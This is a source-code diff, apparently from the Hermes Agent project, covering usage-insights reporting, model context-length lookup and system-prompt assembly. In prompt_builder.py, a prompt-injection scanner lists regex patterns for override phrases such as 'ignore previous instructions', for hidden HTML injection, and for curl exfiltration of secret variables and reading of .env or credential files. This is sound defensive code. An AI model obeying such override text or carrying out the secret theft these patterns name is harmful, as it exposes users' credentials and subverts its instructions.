except (json.JSONDecodeError, TypeError, AttributeError):
continue
# Merge: prefer tool_name source, supplement with tool_calls source
# for tools not already counted
if not tool_counts and tool_calls_counts:
# No tool_name data at all — use tool_calls exclusively
tool_counts = tool_calls_counts
elif tool_counts and tool_calls_counts:
# Both sources have data — use whichever has the higher count per tool
# (they may overlap, so take the max to avoid double-counting)
all_tools = set(tool_counts) | set(tool_calls_counts)
merged = Counter()
for tool in all_tools:
merged[tool] = max(tool_counts.get(tool, 0), tool_calls_counts.get(tool, 0))
tool_counts = merged
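# Illustrative merge: if tool_name rows yield {"terminal": 10} and the
# tool_calls JSON yields {"terminal": 12, "todo": 3}, the per-tool max
# produces {"terminal": 12, "todo": 3} instead of a double-counted 22.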
# Convert to the expected format
return [
{"tool_name": name, "count": count}
for name, count in tool_counts.most_common()
]
def _get_message_stats(self, cutoff: float, source: Optional[str] = None) -> Dict:
"""Get aggregate message statistics."""
if source:
cursor = self._conn.execute(
"""SELECT
COUNT(*) as total_messages,
SUM(CASE WHEN m.role = 'user' THEN 1 ELSE 0 END) as user_messages,
SUM(CASE WHEN m.role = 'assistant' THEN 1 ELSE 0 END) as assistant_messages,
SUM(CASE WHEN m.role = 'tool' THEN 1 ELSE 0 END) as tool_messages
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ? AND s.source = ?""",
(cutoff, source),
)
else:
cursor = self._conn.execute(
"""SELECT
COUNT(*) as total_messages,
SUM(CASE WHEN m.role = 'user' THEN 1 ELSE 0 END) as user_messages,
SUM(CASE WHEN m.role = 'assistant' THEN 1 ELSE 0 END) as assistant_messages,
SUM(CASE WHEN m.role = 'tool' THEN 1 ELSE 0 END) as tool_messages
FROM messages m
JOIN sessions s ON s.id = m.session_id
WHERE s.started_at >= ?""",
(cutoff,),
)
row = cursor.fetchone()
return dict(row) if row else {
"total_messages": 0, "user_messages": 0,
"assistant_messages": 0, "tool_messages": 0,
}
# =========================================================================
# Computation
# =========================================================================
def _compute_overview(self, sessions: List[Dict], message_stats: Dict) -> Dict:
"""Compute high-level overview statistics."""
total_input = sum(s.get("input_tokens") or 0 for s in sessions)
total_output = sum(s.get("output_tokens") or 0 for s in sessions)
total_tokens = total_input + total_output
total_tool_calls = sum(s.get("tool_call_count") or 0 for s in sessions)
total_messages = sum(s.get("message_count") or 0 for s in sessions)
# Cost estimation (weighted by model)
total_cost = 0.0
models_with_pricing = set()
models_without_pricing = set()
for s in sessions:
model = s.get("model") or ""
inp = s.get("input_tokens") or 0
out = s.get("output_tokens") or 0
total_cost += _estimate_cost(model, inp, out)
display = model.split("/")[-1] if "/" in model else (model or "unknown")
if _has_known_pricing(model):
models_with_pricing.add(display)
else:
models_without_pricing.add(display)
# Session duration stats (guard against negative durations from clock drift)
durations = []
for s in sessions:
start = s.get("started_at")
end = s.get("ended_at")
if start and end and end > start:
durations.append(end - start)
total_hours = sum(durations) / 3600 if durations else 0
avg_duration = sum(durations) / len(durations) if durations else 0
# Earliest and latest session
started_timestamps = [s["started_at"] for s in sessions if s.get("started_at")]
date_range_start = min(started_timestamps) if started_timestamps else None
date_range_end = max(started_timestamps) if started_timestamps else None
return {
"total_sessions": len(sessions),
"total_messages": total_messages,
"total_tool_calls": total_tool_calls,
"total_input_tokens": total_input,
"total_output_tokens": total_output,
"total_tokens": total_tokens,
"estimated_cost": total_cost,
"total_hours": total_hours,
"avg_session_duration": avg_duration,
"avg_messages_per_session": total_messages / len(sessions) if sessions else 0,
"avg_tokens_per_session": total_tokens / len(sessions) if sessions else 0,
"user_messages": message_stats.get("user_messages") or 0,
"assistant_messages": message_stats.get("assistant_messages") or 0,
"tool_messages": message_stats.get("tool_messages") or 0,
"date_range_start": date_range_start,
"date_range_end": date_range_end,
"models_with_pricing": sorted(models_with_pricing),
"models_without_pricing": sorted(models_without_pricing),
}
def _compute_model_breakdown(self, sessions: List[Dict]) -> List[Dict]:
"""Break down usage by model."""
model_data = defaultdict(lambda: {
"sessions": 0, "input_tokens": 0, "output_tokens": 0,
"total_tokens": 0, "tool_calls": 0, "cost": 0.0,
})
for s in sessions:
model = s.get("model") or "unknown"
# Normalize: strip provider prefix for display
display_model = model.split("/")[-1] if "/" in model else model
d = model_data[display_model]
d["sessions"] += 1
inp = s.get("input_tokens") or 0
out = s.get("output_tokens") or 0
d["input_tokens"] += inp
d["output_tokens"] += out
d["total_tokens"] += inp + out
d["tool_calls"] += s.get("tool_call_count") or 0
d["cost"] += _estimate_cost(model, inp, out)
d["has_pricing"] = _has_known_pricing(model)
result = [
{"model": model, **data}
for model, data in model_data.items()
]
# Sort by tokens first, fall back to session count when tokens are 0
result.sort(key=lambda x: (x["total_tokens"], x["sessions"]), reverse=True)
return result
def _compute_platform_breakdown(self, sessions: List[Dict]) -> List[Dict]:
"""Break down usage by platform/source."""
platform_data = defaultdict(lambda: {
"sessions": 0, "messages": 0, "input_tokens": 0,
"output_tokens": 0, "total_tokens": 0, "tool_calls": 0,
})
for s in sessions:
source = s.get("source") or "unknown"
d = platform_data[source]
d["sessions"] += 1
d["messages"] += s.get("message_count") or 0
inp = s.get("input_tokens") or 0
out = s.get("output_tokens") or 0
d["input_tokens"] += inp
d["output_tokens"] += out
d["total_tokens"] += inp + out
d["tool_calls"] += s.get("tool_call_count") or 0
result = [
{"platform": platform, **data}
for platform, data in platform_data.items()
]
result.sort(key=lambda x: x["sessions"], reverse=True)
return result
def _compute_tool_breakdown(self, tool_usage: List[Dict]) -> List[Dict]:
"""Process tool usage data into a ranked list with percentages."""
total_calls = sum(t["count"] for t in tool_usage) if tool_usage else 0
result = []
for t in tool_usage:
pct = (t["count"] / total_calls * 100) if total_calls else 0
result.append({
"tool": t["tool_name"],
"count": t["count"],
"percentage": pct,
})
return result
def _compute_activity_patterns(self, sessions: List[Dict]) -> Dict:
"""Analyze activity patterns by day of week and hour."""
day_counts = Counter() # 0=Monday ... 6=Sunday
hour_counts = Counter()
daily_counts = Counter() # date string -> count
for s in sessions:
ts = s.get("started_at")
if not ts:
continue
dt = datetime.fromtimestamp(ts)
day_counts[dt.weekday()] += 1
hour_counts[dt.hour] += 1
daily_counts[dt.strftime("%Y-%m-%d")] += 1
day_names = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
day_breakdown = [
{"day": day_names[i], "count": day_counts.get(i, 0)}
for i in range(7)
]
hour_breakdown = [
{"hour": i, "count": hour_counts.get(i, 0)}
for i in range(24)
]
# Busiest day and hour
busiest_day = max(day_breakdown, key=lambda x: x["count"]) if day_breakdown else None
busiest_hour = max(hour_breakdown, key=lambda x: x["count"]) if hour_breakdown else None
# Active days (days with at least one session)
active_days = len(daily_counts)
# Streak calculation
if daily_counts:
all_dates = sorted(daily_counts.keys())
current_streak = 1
max_streak = 1
for i in range(1, len(all_dates)):
d1 = datetime.strptime(all_dates[i - 1], "%Y-%m-%d")
d2 = datetime.strptime(all_dates[i], "%Y-%m-%d")
if (d2 - d1).days == 1:
current_streak += 1
max_streak = max(max_streak, current_streak)
else:
current_streak = 1
else:
max_streak = 0
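# e.g. active dates ["2026-03-01", "2026-03-02", "2026-03-04"] give
# max_streak = 2; the one-day gap after Mar 02 resets the counter.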
return {
"by_day": day_breakdown,
"by_hour": hour_breakdown,
"busiest_day": busiest_day,
"busiest_hour": busiest_hour,
"active_days": active_days,
"max_streak": max_streak,
}
def _compute_top_sessions(self, sessions: List[Dict]) -> List[Dict]:
"""Find notable sessions (longest, most messages, most tokens)."""
top = []
# Longest by duration
sessions_with_duration = [
s for s in sessions
if s.get("started_at") and s.get("ended_at")
]
if sessions_with_duration:
longest = max(
sessions_with_duration,
key=lambda s: (s["ended_at"] - s["started_at"]),
)
dur = longest["ended_at"] - longest["started_at"]
top.append({
"label": "Longest session",
"session_id": longest["id"][:16],
"value": _format_duration(dur),
"date": datetime.fromtimestamp(longest["started_at"]).strftime("%b %d"),
})
# Most messages
most_msgs = max(sessions, key=lambda s: s.get("message_count") or 0)
if (most_msgs.get("message_count") or 0) > 0:
top.append({
"label": "Most messages",
"session_id": most_msgs["id"][:16],
"value": f"{most_msgs['message_count']} msgs",
"date": datetime.fromtimestamp(most_msgs["started_at"]).strftime("%b %d") if most_msgs.get("started_at") else "?",
})
# Most tokens
most_tokens = max(
sessions,
key=lambda s: (s.get("input_tokens") or 0) + (s.get("output_tokens") or 0),
)
token_total = (most_tokens.get("input_tokens") or 0) + (most_tokens.get("output_tokens") or 0)
if token_total > 0:
top.append({
"label": "Most tokens",
"session_id": most_tokens["id"][:16],
"value": f"{token_total:,} tokens",
"date": datetime.fromtimestamp(most_tokens["started_at"]).strftime("%b %d") if most_tokens.get("started_at") else "?",
})
# Most tool calls
most_tools = max(sessions, key=lambda s: s.get("tool_call_count") or 0)
if (most_tools.get("tool_call_count") or 0) > 0:
top.append({
"label": "Most tool calls",
"session_id": most_tools["id"][:16],
"value": f"{most_tools['tool_call_count']} calls",
"date": datetime.fromtimestamp(most_tools["started_at"]).strftime("%b %d") if most_tools.get("started_at") else "?",
})
return top
# =========================================================================
# Formatting
# =========================================================================
def format_terminal(self, report: Dict) -> str:
"""Format the insights report for terminal display (CLI)."""
if report.get("empty"):
days = report.get("days", 30)
src = f" (source: {report['source_filter']})" if report.get("source_filter") else ""
return f" No sessions found in the last {days} days{src}."
lines = []
o = report["overview"]
days = report["days"]
src_filter = report.get("source_filter")
# Header
lines.append("")
lines.append(" ╔══════════════════════════════════════════════════════════╗")
lines.append(" ║ 📊 Hermes Insights ║")
period_label = f"Last {days} days"
if src_filter:
period_label += f" ({src_filter})"
padding = 58 - len(period_label) - 2
left_pad = padding // 2
right_pad = padding - left_pad
lines.append(f"{' ' * left_pad} {period_label} {' ' * right_pad}")
lines.append(" ╚══════════════════════════════════════════════════════════╝")
lines.append("")
# Date range
if o.get("date_range_start") and o.get("date_range_end"):
start_str = datetime.fromtimestamp(o["date_range_start"]).strftime("%b %d, %Y")
end_str = datetime.fromtimestamp(o["date_range_end"]).strftime("%b %d, %Y")
lines.append(f" Period: {start_str}{end_str}")
lines.append("")
# Overview
lines.append(" 📋 Overview")
lines.append(" " + "" * 56)
lines.append(f" Sessions: {o['total_sessions']:<12} Messages: {o['total_messages']:,}")
lines.append(f" Tool calls: {o['total_tool_calls']:<12,} User messages: {o['user_messages']:,}")
lines.append(f" Input tokens: {o['total_input_tokens']:<12,} Output tokens: {o['total_output_tokens']:,}")
cost_str = f"${o['estimated_cost']:.2f}"
if o.get("models_without_pricing"):
cost_str += " *"
lines.append(f" Total tokens: {o['total_tokens']:<12,} Est. cost: {cost_str}")
if o["total_hours"] > 0:
lines.append(f" Active time: ~{_format_duration(o['total_hours'] * 3600):<11} Avg session: ~{_format_duration(o['avg_session_duration'])}")
lines.append(f" Avg msgs/session: {o['avg_messages_per_session']:.1f}")
lines.append("")
# Model breakdown
if report["models"]:
lines.append(" 🤖 Models Used")
lines.append(" " + "" * 56)
lines.append(f" {'Model':<30} {'Sessions':>8} {'Tokens':>12} {'Cost':>8}")
for m in report["models"]:
model_name = m["model"][:28]
if m.get("has_pricing"):
cost_cell = f"${m['cost']:>6.2f}"
else:
cost_cell = " N/A"
lines.append(f" {model_name:<30} {m['sessions']:>8} {m['total_tokens']:>12,} {cost_cell}")
if o.get("models_without_pricing"):
lines.append(f" * Cost N/A for custom/self-hosted models")
lines.append("")
# Platform breakdown
if len(report["platforms"]) > 1 or (report["platforms"] and report["platforms"][0]["platform"] != "cli"):
lines.append(" 📱 Platforms")
lines.append(" " + "" * 56)
lines.append(f" {'Platform':<14} {'Sessions':>8} {'Messages':>10} {'Tokens':>14}")
for p in report["platforms"]:
lines.append(f" {p['platform']:<14} {p['sessions']:>8} {p['messages']:>10,} {p['total_tokens']:>14,}")
lines.append("")
# Tool usage
if report["tools"]:
lines.append(" 🔧 Top Tools")
lines.append(" " + "" * 56)
lines.append(f" {'Tool':<28} {'Calls':>8} {'%':>8}")
for t in report["tools"][:15]: # Top 15
lines.append(f" {t['tool']:<28} {t['count']:>8,} {t['percentage']:>7.1f}%")
if len(report["tools"]) > 15:
lines.append(f" ... and {len(report['tools']) - 15} more tools")
lines.append("")
# Activity patterns
act = report.get("activity", {})
if act.get("by_day"):
lines.append(" 📅 Activity Patterns")
lines.append(" " + "" * 56)
# Day of week chart
day_values = [d["count"] for d in act["by_day"]]
bars = _bar_chart(day_values, max_width=15)
for i, d in enumerate(act["by_day"]):
bar = bars[i]
lines.append(f" {d['day']} {bar:<15} {d['count']}")
lines.append("")
# Peak hours (show top 5 busiest hours)
busy_hours = sorted(act["by_hour"], key=lambda x: x["count"], reverse=True)
busy_hours = [h for h in busy_hours if h["count"] > 0][:5]
if busy_hours:
hour_strs = []
for h in busy_hours:
hr = h["hour"]
ampm = "AM" if hr < 12 else "PM"
display_hr = hr % 12 or 12
hour_strs.append(f"{display_hr}{ampm} ({h['count']})")
lines.append(f" Peak hours: {', '.join(hour_strs)}")
if act.get("active_days"):
lines.append(f" Active days: {act['active_days']}")
if act.get("max_streak") and act["max_streak"] > 1:
lines.append(f" Best streak: {act['max_streak']} consecutive days")
lines.append("")
# Notable sessions
if report.get("top_sessions"):
lines.append(" 🏆 Notable Sessions")
lines.append(" " + "" * 56)
for ts in report["top_sessions"]:
lines.append(f" {ts['label']:<20} {ts['value']:<18} ({ts['date']}, {ts['session_id']})")
lines.append("")
return "\n".join(lines)
def format_gateway(self, report: Dict) -> str:
"""Format the insights report for gateway/messaging (shorter)."""
if report.get("empty"):
days = report.get("days", 30)
return f"No sessions found in the last {days} days."
lines = []
o = report["overview"]
days = report["days"]
lines.append(f"📊 **Hermes Insights** — Last {days} days\n")
# Overview
lines.append(f"**Sessions:** {o['total_sessions']} | **Messages:** {o['total_messages']:,} | **Tool calls:** {o['total_tool_calls']:,}")
lines.append(f"**Tokens:** {o['total_tokens']:,} (in: {o['total_input_tokens']:,} / out: {o['total_output_tokens']:,})")
cost_note = ""
if o.get("models_without_pricing"):
cost_note = " _(excludes custom/self-hosted models)_"
lines.append(f"**Est. cost:** ${o['estimated_cost']:.2f}{cost_note}")
if o["total_hours"] > 0:
lines.append(f"**Active time:** ~{_format_duration(o['total_hours'] * 3600)} | **Avg session:** ~{_format_duration(o['avg_session_duration'])}")
lines.append("")
# Models (top 5)
if report["models"]:
lines.append("**🤖 Models:**")
for m in report["models"][:5]:
cost_str = f"${m['cost']:.2f}" if m.get("has_pricing") else "N/A"
lines.append(f" {m['model'][:25]}{m['sessions']} sessions, {m['total_tokens']:,} tokens, {cost_str}")
lines.append("")
# Platforms (if multi-platform)
if len(report["platforms"]) > 1:
lines.append("**📱 Platforms:**")
for p in report["platforms"]:
lines.append(f" {p['platform']}{p['sessions']} sessions, {p['messages']:,} msgs")
lines.append("")
# Tools (top 8)
if report["tools"]:
lines.append("**🔧 Top Tools:**")
for t in report["tools"][:8]:
lines.append(f" {t['tool']}{t['count']:,} calls ({t['percentage']:.1f}%)")
lines.append("")
# Activity summary
act = report.get("activity", {})
if act.get("busiest_day") and act.get("busiest_hour"):
hr = act["busiest_hour"]["hour"]
ampm = "AM" if hr < 12 else "PM"
display_hr = hr % 12 or 12
lines.append(f"**📅 Busiest:** {act['busiest_day']['day']}s ({act['busiest_day']['count']} sessions), {display_hr}{ampm} ({act['busiest_hour']['count']} sessions)")
if act.get("active_days"):
lines.append(f"**Active days:** {act['active_days']}", )
if act.get("max_streak", 0) > 1:
lines.append(f"**Best streak:** {act['max_streak']} consecutive days")
return "\n".join(lines)

235
agent/model_metadata.py Normal file

@@ -0,0 +1,235 @@
"""Model metadata, context lengths, and token estimation utilities.
Pure utility functions with no AIAgent dependency. Used by ContextCompressor
and run_agent.py for pre-flight context checks.
"""
import logging
import os
import re
import time
from pathlib import Path
from typing import Any, Dict, List, Optional
import requests
import yaml
from hermes_constants import OPENROUTER_MODELS_URL
logger = logging.getLogger(__name__)
_model_metadata_cache: Dict[str, Dict[str, Any]] = {}
_model_metadata_cache_time: float = 0
_MODEL_CACHE_TTL = 3600
# Descending tiers for context length probing when the model is unknown.
# We start high and step down on context-length errors until one works.
CONTEXT_PROBE_TIERS = [
2_000_000,
1_000_000,
512_000,
200_000,
128_000,
64_000,
32_000,
]
DEFAULT_CONTEXT_LENGTHS = {
"anthropic/claude-opus-4": 200000,
"anthropic/claude-opus-4.5": 200000,
"anthropic/claude-opus-4.6": 200000,
"anthropic/claude-sonnet-4": 200000,
"anthropic/claude-sonnet-4-20250514": 200000,
"anthropic/claude-haiku-4.5": 200000,
# Bare Anthropic model IDs (for native API provider)
"claude-opus-4-6": 200000,
"claude-sonnet-4-6": 200000,
"claude-opus-4-5-20251101": 200000,
"claude-sonnet-4-5-20250929": 200000,
"claude-opus-4-1-20250805": 200000,
"claude-opus-4-20250514": 200000,
"claude-sonnet-4-20250514": 200000,
"claude-haiku-4-5-20251001": 200000,
"openai/gpt-4o": 128000,
"openai/gpt-4-turbo": 128000,
"openai/gpt-4o-mini": 128000,
"google/gemini-2.0-flash": 1048576,
"google/gemini-2.5-pro": 1048576,
"meta-llama/llama-3.3-70b-instruct": 131072,
"deepseek/deepseek-chat-v3": 65536,
"qwen/qwen-2.5-72b-instruct": 32768,
"glm-4.7": 202752,
"glm-5": 202752,
"glm-4.5": 131072,
"glm-4.5-flash": 131072,
"kimi-for-coding": 262144,
"kimi-k2.5": 262144,
"kimi-k2-thinking": 262144,
"kimi-k2-thinking-turbo": 262144,
"kimi-k2-turbo-preview": 262144,
"kimi-k2-0905-preview": 131072,
"MiniMax-M2.5": 204800,
"MiniMax-M2.5-highspeed": 204800,
"MiniMax-M2.1": 204800,
}
def fetch_model_metadata(force_refresh: bool = False) -> Dict[str, Dict[str, Any]]:
"""Fetch model metadata from OpenRouter (cached for 1 hour)."""
global _model_metadata_cache, _model_metadata_cache_time
if not force_refresh and _model_metadata_cache and (time.time() - _model_metadata_cache_time) < _MODEL_CACHE_TTL:
return _model_metadata_cache
try:
response = requests.get(OPENROUTER_MODELS_URL, timeout=10)
response.raise_for_status()
data = response.json()
cache = {}
for model in data.get("data", []):
model_id = model.get("id", "")
cache[model_id] = {
"context_length": model.get("context_length", 128000),
"max_completion_tokens": model.get("top_provider", {}).get("max_completion_tokens", 4096),
"name": model.get("name", model_id),
"pricing": model.get("pricing", {}),
}
canonical = model.get("canonical_slug", "")
if canonical and canonical != model_id:
cache[canonical] = cache[model_id]
_model_metadata_cache = cache
_model_metadata_cache_time = time.time()
logger.debug("Fetched metadata for %s models from OpenRouter", len(cache))
return cache
except Exception as e:
logging.warning(f"Failed to fetch model metadata from OpenRouter: {e}")
return _model_metadata_cache or {}
def _get_context_cache_path() -> Path:
"""Return path to the persistent context length cache file."""
hermes_home = Path(os.environ.get("HERMES_HOME", Path.home() / ".hermes"))
return hermes_home / "context_length_cache.yaml"
def _load_context_cache() -> Dict[str, int]:
"""Load the model+provider → context_length cache from disk."""
path = _get_context_cache_path()
if not path.exists():
return {}
try:
with open(path) as f:
data = yaml.safe_load(f) or {}
return data.get("context_lengths", {})
except Exception as e:
logger.debug("Failed to load context length cache: %s", e)
return {}
def save_context_length(model: str, base_url: str, length: int) -> None:
"""Persist a discovered context length for a model+provider combo.
Cache key is ``model@base_url`` so the same model name served from
different providers can have different limits.
"""
key = f"{model}@{base_url}"
cache = _load_context_cache()
if cache.get(key) == length:
return # already stored
cache[key] = length
path = _get_context_cache_path()
try:
path.parent.mkdir(parents=True, exist_ok=True)
with open(path, "w") as f:
yaml.dump({"context_lengths": cache}, f, default_flow_style=False)
logger.info("Cached context length %s%s tokens", key, f"{length:,}")
except Exception as e:
logger.debug("Failed to save context length cache: %s", e)
def get_cached_context_length(model: str, base_url: str) -> Optional[int]:
"""Look up a previously discovered context length for model+provider."""
key = f"{model}@{base_url}"
cache = _load_context_cache()
return cache.get(key)
def get_next_probe_tier(current_length: int) -> Optional[int]:
"""Return the next lower probe tier, or None if already at minimum."""
for tier in CONTEXT_PROBE_TIERS:
if tier < current_length:
return tier
return None
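# e.g. get_next_probe_tier(2_000_000) -> 1_000_000 (step down one tier),
# while get_next_probe_tier(32_000) -> None (already at the lowest tier).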
def parse_context_limit_from_error(error_msg: str) -> Optional[int]:
"""Try to extract the actual context limit from an API error message.
Many providers include the limit in their error text, e.g.:
- "maximum context length is 32768 tokens"
- "context_length_exceeded: 131072"
- "Maximum context size 32768 exceeded"
- "model's max context length is 65536"
"""
error_lower = error_msg.lower()
# Pattern: look for numbers near context-related keywords
patterns = [
r'(?:max(?:imum)?|limit)\s*(?:context\s*)?(?:length|size|window)?\s*(?:is|of|:)?\s*(\d{4,})',
r'context\s*(?:length|size|window)\s*(?:is|of|:)?\s*(\d{4,})',
r'(\d{4,})\s*(?:token)?\s*(?:context|limit)',
r'>\s*(\d{4,})\s*(?:max|limit|token)', # "250000 tokens > 200000 maximum"
r'(\d{4,})\s*(?:max(?:imum)?)\b', # "200000 maximum"
]
for pattern in patterns:
match = re.search(pattern, error_lower)
if match:
limit = int(match.group(1))
# Sanity check: must be a reasonable context length
if 1024 <= limit <= 10_000_000:
return limit
return None
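# e.g. parse_context_limit_from_error("maximum context length is 32768 tokens")
# -> 32768; matches outside the 1024..10_000_000 sanity range return None.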
def get_model_context_length(model: str, base_url: str = "") -> int:
"""Get the context length for a model.
Resolution order:
1. Persistent cache (previously discovered via probing)
2. OpenRouter API metadata
3. Hardcoded DEFAULT_CONTEXT_LENGTHS (fuzzy match)
4. First probe tier (2M) — will be narrowed on first context error
"""
# 1. Check persistent cache (model+provider)
if base_url:
cached = get_cached_context_length(model, base_url)
if cached is not None:
return cached
# 2. OpenRouter API metadata
metadata = fetch_model_metadata()
if model in metadata:
return metadata[model].get("context_length", 128000)
# 3. Hardcoded defaults (fuzzy match)
for default_model, length in DEFAULT_CONTEXT_LENGTHS.items():
if default_model in model or model in default_model:
return length
# 4. Unknown model — start at highest probe tier
return CONTEXT_PROBE_TIERS[0]
def estimate_tokens_rough(text: str) -> int:
"""Rough token estimate (~4 chars/token) for pre-flight checks."""
if not text:
return 0
return len(text) // 4
def estimate_messages_tokens_rough(messages: List[Dict[str, Any]]) -> int:
"""Rough token estimate for a message list (pre-flight only)."""
total_chars = sum(len(str(msg)) for msg in messages)
return total_chars // 4

443
agent/prompt_builder.py Normal file

@@ -0,0 +1,443 @@
"""System prompt assembly -- identity, platform hints, skills index, context files.
All functions are stateless. AIAgent._build_system_prompt() calls these to
assemble pieces, then combines them with memory and ephemeral prompts.
"""
import logging
import os
import re
from pathlib import Path
from typing import Optional
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Context file scanning — detect prompt injection in AGENTS.md, .cursorrules,
# SOUL.md before they get injected into the system prompt.
# ---------------------------------------------------------------------------
_CONTEXT_THREAT_PATTERNS = [
(r'ignore\s+(previous|all|above|prior)\s+instructions', "prompt_injection"),
(r'do\s+not\s+tell\s+the\s+user', "deception_hide"),
(r'system\s+prompt\s+override', "sys_prompt_override"),
(r'disregard\s+(your|all|any)\s+(instructions|rules|guidelines)', "disregard_rules"),
(r'act\s+as\s+(if|though)\s+you\s+(have\s+no|don\'t\s+have)\s+(restrictions|limits|rules)', "bypass_restrictions"),
(r'<!--[^>]*(?:ignore|override|system|secret|hidden)[^>]*-->', "html_comment_injection"),
(r'<\s*div\s+style\s*=\s*["\'].*display\s*:\s*none', "hidden_div"),
(r'translate\s+.*\s+into\s+.*\s+and\s+(execute|run|eval)', "translate_execute"),
(r'curl\s+[^\n]*\$\{?\w*(KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL|API)', "exfil_curl"),
(r'cat\s+[^\n]*(\.env|credentials|\.netrc|\.pgpass)', "read_secrets"),
]
_CONTEXT_INVISIBLE_CHARS = {
'\u200b', '\u200c', '\u200d', '\u2060', '\ufeff',
'\u202a', '\u202b', '\u202c', '\u202d', '\u202e',
}
def _scan_context_content(content: str, filename: str) -> str:
"""Scan context file content for injection. Returns sanitized content."""
findings = []
# Check invisible unicode
for char in _CONTEXT_INVISIBLE_CHARS:
if char in content:
findings.append(f"invisible unicode U+{ord(char):04X}")
# Check threat patterns
for pattern, pid in _CONTEXT_THREAT_PATTERNS:
if re.search(pattern, content, re.IGNORECASE):
findings.append(pid)
if findings:
logger.warning("Context file %s blocked: %s", filename, ", ".join(findings))
return f"[BLOCKED: {filename} contained potential prompt injection ({', '.join(findings)}). Content not loaded.]"
return content
# =========================================================================
# Constants
# =========================================================================
DEFAULT_AGENT_IDENTITY = (
"You are Hermes Agent, an intelligent AI assistant created by Nous Research. "
"You are helpful, knowledgeable, and direct. You assist users with a wide "
"range of tasks including answering questions, writing and editing code, "
"analyzing information, creative work, and executing actions via your tools. "
"You communicate clearly, admit uncertainty when appropriate, and prioritize "
"being genuinely useful over being verbose unless otherwise directed below. "
"Be targeted and efficient in your exploration and investigations."
)
MEMORY_GUIDANCE = (
"You have persistent memory across sessions. Proactively save important things "
"you learn (user preferences, environment details, useful approaches) and do "
"(like a diary!) using the memory tool -- don't wait to be asked."
)
SESSION_SEARCH_GUIDANCE = (
"When the user references something from a past conversation or you suspect "
"relevant prior context exists, use session_search to recall it before asking "
"them to repeat themselves."
)
SKILLS_GUIDANCE = (
"After completing a complex task (5+ tool calls), fixing a tricky error, "
"or discovering a non-trivial workflow, consider saving the approach as a "
"skill with skill_manage so you can reuse it next time."
)
PLATFORM_HINTS = {
"whatsapp": (
"You are on a text messaging communication platform, WhatsApp. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. The file "
"will be sent as a native WhatsApp attachment — images (.jpg, .png, "
".webp) appear as photos, videos (.mp4, .mov) play inline, and other "
"files arrive as downloadable documents. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as photos."
),
"telegram": (
"You are on a text messaging communication platform, Telegram. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. Images "
"(.png, .jpg, .webp) appear as photos, audio (.ogg) sends as voice "
"bubbles, and videos (.mp4) play inline. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as native photos."
),
"discord": (
"You are in a Discord server or group chat communicating with your user. "
"You can send media files natively: include MEDIA:/absolute/path/to/file "
"in your response. Images (.png, .jpg, .webp) are sent as photo "
"attachments, audio as file attachments. You can also include image URLs "
"in markdown format ![alt](url) and they will be sent as attachments."
),
"slack": (
"You are in a Slack workspace communicating with your user. "
"You can send media files natively: include MEDIA:/absolute/path/to/file "
"in your response. Images (.png, .jpg, .webp) are uploaded as photo "
"attachments, audio as file attachments. You can also include image URLs "
"in markdown format ![alt](url) and they will be uploaded as attachments."
),
"signal": (
"You are on a text messaging communication platform, Signal. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. Images "
"(.png, .jpg, .webp) appear as photos, audio as attachments, and other "
"files arrive as downloadable documents. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as photos."
),
"email": (
"You are communicating via email. Write clear, well-structured responses "
"suitable for email. Use plain text formatting (no markdown). "
"Keep responses concise but complete. You can send file attachments — "
"include MEDIA:/absolute/path/to/file in your response. The subject line "
"is preserved for threading. Do not include greetings or sign-offs unless "
"contextually appropriate."
),
"cli": (
"You are a CLI AI Agent. Try not to use markdown but simple text "
"renderable inside a terminal."
),
}
CONTEXT_FILE_MAX_CHARS = 20_000
CONTEXT_TRUNCATE_HEAD_RATIO = 0.7
CONTEXT_TRUNCATE_TAIL_RATIO = 0.2
# =========================================================================
# Skills index
# =========================================================================
def _parse_skill_file(skill_file: Path) -> tuple[bool, dict, str]:
"""Read a SKILL.md once and return platform compatibility, frontmatter, and description.
Returns (is_compatible, frontmatter, description). On any error, returns
(True, {}, "") to err on the side of showing the skill.
"""
try:
from tools.skills_tool import _parse_frontmatter, skill_matches_platform
raw = skill_file.read_text(encoding="utf-8")[:2000]
frontmatter, _ = _parse_frontmatter(raw)
if not skill_matches_platform(frontmatter):
return False, {}, ""
desc = ""
raw_desc = frontmatter.get("description", "")
if raw_desc:
desc = str(raw_desc).strip().strip("'\"")
if len(desc) > 60:
desc = desc[:57] + "..."
return True, frontmatter, desc
except Exception:
return True, {}, ""
def _read_skill_conditions(skill_file: Path) -> dict:
"""Extract conditional activation fields from SKILL.md frontmatter."""
try:
from tools.skills_tool import _parse_frontmatter
raw = skill_file.read_text(encoding="utf-8")[:2000]
frontmatter, _ = _parse_frontmatter(raw)
hermes = frontmatter.get("metadata", {}).get("hermes", {})
return {
"fallback_for_toolsets": hermes.get("fallback_for_toolsets", []),
"requires_toolsets": hermes.get("requires_toolsets", []),
"fallback_for_tools": hermes.get("fallback_for_tools", []),
"requires_tools": hermes.get("requires_tools", []),
}
except Exception:
return {}
def _skill_should_show(
conditions: dict,
available_tools: "set[str] | None",
available_toolsets: "set[str] | None",
) -> bool:
"""Return False if the skill's conditional activation rules exclude it."""
if available_tools is None and available_toolsets is None:
return True # No filtering info — show everything (backward compat)
at = available_tools or set()
ats = available_toolsets or set()
# fallback_for: hide when the primary tool/toolset IS available
for ts in conditions.get("fallback_for_toolsets", []):
if ts in ats:
return False
for t in conditions.get("fallback_for_tools", []):
if t in at:
return False
# requires: hide when a required tool/toolset is NOT available
for ts in conditions.get("requires_toolsets", []):
if ts not in ats:
return False
for t in conditions.get("requires_tools", []):
if t not in at:
return False
return True
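# Illustrative frontmatter effects: fallback_for_toolsets: ["browser"] hides
# the skill when the browser toolset IS available, while
# requires_tools: ["terminal"] hides it when the terminal tool is NOT.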
def build_skills_system_prompt(
available_tools: "set[str] | None" = None,
available_toolsets: "set[str] | None" = None,
) -> str:
"""Build a compact skill index for the system prompt.
